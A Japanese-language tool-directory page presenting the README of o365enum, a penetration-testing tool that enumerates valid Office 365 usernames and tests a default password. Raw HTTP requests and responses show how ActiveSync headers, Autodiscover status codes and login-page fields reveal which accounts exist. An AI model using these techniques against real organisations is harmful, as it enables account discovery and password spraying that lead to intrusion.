Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
o365enum — ActiveSync、Autodiscover v1、またはoffice.comのログインページを使用して、Office 365から有効なユーザー名を列挙する。 | Kitploit
ツール/GitHubGitHub/gremwell/o365enum
OSINT (オープンソースインテリジェンス)偵察情報収集ウェブセキュリティ
GitHubgremwell/o365enum

o365enum

ActiveSync、Autodiscover v1、またはoffice.comのログインページを使用して、Office 365から有効なユーザー名を列挙する。

リポジトリを見るウェブサイト
30143102年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Office 365 ユーザー列挙

ActiveSync、Autodiscover、または office.com のログインページを使用して、Office 365 から有効なユーザー名を列挙します。

使用方法

o365enum は、最初のパラメーターとして指定されたファイルからユーザー名を読み取ります。ファイルには1行に1つのユーザー名を記述します。出力はCSV形式で、解析が容易です。有効ステータスは、0(無効なユーザー)、1(有効なユーザー)、2(有効なユーザーかつ有効なパスワード)です。

python3.6 o365enum.py -h
usage: o365enum.py [-h] -u USERLIST [-p PASSWORD] [-n NUM] [-v]
                   [-m {activesync,autodiscover,office.com}]

Office365 User Enumeration Script

optional arguments:
  -h, --help            show this help message and exit
  -u USERLIST, --userlist USERLIST
                        username list one per line (default: None)
  -p PASSWORD, --password PASSWORD
                        password to try (default: Password1)
  -n NUM, --num NUM     # of reattempts to remove false negatives (default: 3)
  -v, --verbose         Enable verbose output at urllib level (default: False)
  -m {activesync,autodiscover,office.com}, --method {activesync,autodiscover,office.com}
                        method to use (default: activesync)

実行例:

./o365enum.py -u users.txt -p Password2 -n 1 -m activesync
username,valid
[email protected],0
[email protected],1

列挙手法

ActiveSync 列挙

この手法は grimhacker の手法に基づいており、ActiveSync エンドポイントに Basic HTTP 認証リクエストを送信します。ただし、ステータスコードのチェックは、Office365 がユーザーの存在有無にかかわらず 401 を返すため、もはや機能しません。

代わりに、同じリクエストを送信し、カスタム HTTP レスポンスヘッダー (X-MailboxGuid) の有無をチェックして、ユーザー名が有効かどうかを識別します。

既存のアカウント

以下のリクエストには、Authorization ヘッダーに Base64 エンコードされた認証情報が含まれています: [email protected]:Password1

OPTIONS /Microsoft-Server-ActiveSync HTTP/1.1
Host: outlook.office365.com
Connection: close
MS-ASProtocolVersion: 14.0
Content-Length: 0
Authorization: Basic dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE=

これにより、以下のレスポンス("401 Unauthorized")が返され、X-MailboxGuid ヘッダーが設定されます。これはユーザー名は有効だがパスワードが無効であることを示しています。

Date: Fri, 31 Jan 2020 13:02:46 GMT
Connection: close
HTTP/1.1 401 Unauthorized
Content-Length: 1293
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: d494a4bc-3867-436a-93ef-737f9e0522eb
X-CalculatedBETarget: AM0PR09MB2882.eurprd09.prod.outlook.com
X-BackEndHttpStatus: 401
X-RUM-Validated: 1
X-MailboxGuid: aadaf467-cd08-4a23-909b-9702eca5b845 <--- このヘッダーがアカウントのステータス(存在する)を漏洩します
X-DiagInfo: AM0PR09MB2882
X-BEServer: AM0PR09MB2882
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 401
X-Powered-By: ASP.NET
X-FEServer: AM0PR06CA0096
WWW-Authenticate: Basic Realm="",Negotiate
Date: Fri, 31 Jan 2020 13:02:46 GMT
Connection: close

--snip--

存在しないアカウント

以下のリクエストには、Authorization ヘッダーに Base64 エンコードされた認証情報が含まれています: [email protected]:Password1

OPTIONS /Microsoft-Server-ActiveSync HTTP/1.1
Host: outlook.office365.com
Connection: close
MS-ASProtocolVersion: 14.0
Content-Length: 2
Authorization: Basic aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ==

これにより、以下のレスポンス("401 Unauthorized")が返されますが、今回は X-MailboxGuid ヘッダーがなく、ユーザー名が無効であることを示しています。

HTTP/1.1 401 Unauthorized
Content-Length: 1293
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: 2944dbfc-8a1e-4759-a8a2-e4568950601d
X-CalculatedFETarget: DB3PR0102CU001.internal.outlook.com
X-BackEndHttpStatus: 401
WWW-Authenticate: Basic Realm="",Negotiate
X-FEProxyInfo: DB3PR0102CA0017.EURPRD01.PROD.EXCHANGELABS.COM
X-CalculatedBETarget: DB7PR04MB5452.eurprd04.prod.outlook.com
X-BackEndHttpStatus: 401
X-RUM-Validated: 1
X-DiagInfo: DB7PR04MB5452
X-BEServer: DB7PR04MB5452
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 401
X-FEServer: DB3PR0102CA0017
X-Powered-By: ASP.NET
X-FEServer: AM0PR04CA0024
Date: Fri, 31 Jan 2020 16:19:11 GMT
Connection: close

--snip--

Autodiscover 列挙

autodiscover エンドポイントは、認証を試行せずにユーザー列挙を可能にします。エンドポイントは、ユーザーが存在する場合は 200 ステータスコードを、存在しない場合は 302 を返します(リダイレクトがオンプレミスの Exchange サーバーに送られる場合を除く)。

既存のユーザー

GET /autodiscover/autodiscover.json/v1.0/[email protected]?Protocol=Autodiscoverv1 HTTP/1.1
Host: outlook.office365.com
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.12026; Pro
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
MS-ASProtocolVersion: 14.0
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 97
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/10.0
request-id: fee7f899-7115-43da-9d34-d3ee19920a89
X-CalculatedBETarget: AM0PR09MB2882.eurprd09.prod.outlook.com
X-BackEndHttpStatus: 200
X-RUM-Validated: 1
X-AspNet-Version: 4.0.30319
X-DiagInfo: AM0PR09MB2882
X-BEServer: AM0PR09MB2882
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 200
X-Powered-By: ASP.NET
X-FEServer: AM0PR0202CA0008
Date: Mon, 02 Mar 2020 12:50:48 GMT
Connection: close

{"Protocol":"Autodiscoverv1","Url":"https://outlook.office365.com/autodiscover/autodiscover.xml"}

存在しないユーザー

GET /autodiscover/autodiscover.json/v1.0/[email protected]?Protocol=Autodiscoverv1 HTTP/1.1
Host: outlook.office365.com
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.12026; Pro
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
MS-ASProtocolVersion: 14.0
HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 277
Content-Type: text/html; charset=utf-8
Location: https://outlook.office365.com/autodiscover/autodiscover.json?Email=nonexistent%40contoso.com&Protocol=Autodiscoverv1&RedirectCount=1
Server: Microsoft-IIS/10.0
request-id: 1c50adeb-53ac-41b9-9c34-7045cffbae45
X-CalculatedBETarget: DB6PR0202MB2568.eurprd02.prod.outlook.com
X-BackEndHttpStatus: 302
X-RUM-Validated: 1
X-AspNet-Version: 4.0.30319
X-DiagInfo: DB6PR0202MB2568
X-BEServer: DB6PR0202MB2568
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 302
X-Powered-By: ASP.NET
X-FEServer: AM0PR0202CA0013
Date: Mon, 02 Mar 2020 12:50:50 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://outlook.office365.com/autodiscover/autodiscover.json?Email=nonexistent%40contoso.com&amp;Protocol=Autodiscoverv1&amp;RedirectCount=1">here</a>.</h2>
</body></html>

Office.com 列挙

警告: この手法は、Exchange Online のサブスクライバーであり、オンプレミスまたはハイブリッド展開の Exchange サーバーを持たない組織でのみ機能します。

オンプレミスの Exchange サーバーや何らかのハイブリッド展開を使用している企業の場合、私がまだ特定していない設定に基づき、サーバーがあらゆるユーザー名に対してユーザーが存在することを示す値を返す可能性があります。

この手法は、'Password1' で認証試行を消費したくない場合に便利です :)

ユーザーの存在を確認する

IfExistsResult プロパティは、アカウントが存在するかどうか、およびどのように存在するかを記述するために使用されます。この RSM ブログ記事 で説明されているように、値は次のとおりです。

項目値
-1不明なエラー
0アカウントは存在し、認証にそのドメインを使用する
1アカウントは存在しない
2レスポンスがスロットリングされている
4何らかのサーバーエラー
5アカウントは存在するが、別の ID プロバイダーで認証するように設定されている。これはアカウントが個人アカウントとしてのみ使用されていることを示す可能性がある
6アカウントは存在し、ドメインと別の ID プロバイダーの両方を使用するように設定されている
既存のユーザー

アカウントが存在する場合、IfExistsResult は上記の整数のいずれかに設定され、一般的には 0 です。

POST /common/GetCredentialType?mkt=en-US HTTP/1.1
Host: login.microsoftonline.com
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Accept: application/json
Connection: close
client-request-id: 4345a7b9-9a63-4910-a426-35363201d503
hpgrequestid: 23975ac9-f51c-443a-8318-db006fd83100
Referer: https://login.microsoftonline.com/common/oauth2/authorize
canary: --snip--
hpgact: 1800
hpgid: 1104
Origin: https://login.microsoftonline.com
Cookie: --snip--
Content-Length: 1255
Content-Type: application/json
ツールをダウンロード